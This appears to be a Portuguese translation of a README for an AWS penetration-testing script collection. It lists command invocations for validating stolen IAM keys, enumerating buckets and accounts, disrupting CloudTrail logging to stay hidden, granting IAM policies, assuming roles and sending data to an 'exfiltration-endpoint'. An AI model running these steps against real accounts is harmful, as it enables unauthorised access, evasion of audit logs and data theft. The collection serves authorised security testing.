
Uma coleção de material de teste de penetração AWS
Esta é uma coleção de scripts terrivelmente escritos para realizar várias tarefas relacionadas a testes de penetração na AWS. Por favor, não fique triste se não funcionar para você. Pode ser que a AWS tenha mudado desde que uma determinada ferramenta foi escrita ou pode ser que o código é uma porcaria. De qualquer forma, sinta-se à vontade para contribuir.
A maior parte dessa porcaria foi escrita por Daniel Grzelak, mas houve muitas contribuições, principalmente de Mike Fuller.
pip install -r requirements.txt
Certifique-se também de configurar suas credenciais AWS em ~/.aws/credentials.
Coisas para fazer com a coleta de informações pré-comprometimento.
./validate_iam_access_keys.py -i /tmp/keys.txt -o /tmp/out.json
./validate_s3_buckets.py -i /tmp/words.txt -o /tmp/out.json
./validate_iam_principals.py -a 123456789012 -i /tmp/words.txt -o /tmp/out.json
./validate_accounts.py -i /tmp/accounts.txt -o /tmp/out.json
Coisas que ajudarão você a ganhar uma posição em uma conta.
Coisas que podem ajudar você a permanecer oculto após comprometer uma conta.
./disrupt_cloudtrail.py -s
Coisas para ajudar você a entender o que você comprometeu.
./dump_account_data.sh /tmp/
Coisas para ajudar você a navegar por uma conta e obter diferentes níveis de acesso.
./dump_instance_attributes.py -u -o /tmp/
./dump_cloudformation_stack_descriptions.py -o /tmp/data
./assume_roles.py -o /tmp/out.json
./add_iam_policy.py -u myuser -r myrole -g mygroup
./bouncy_bouncy_cloudy_cloud.py -i instance-id -e exfiltration-endpoint
Coisas para ajudar a manter seu acesso a uma conta.
Coisas para ajudar você a extrair e mover dados de maneiras AWS.
Outras coisas que eu era muito estúpido ou muito preguiçoso para classificar.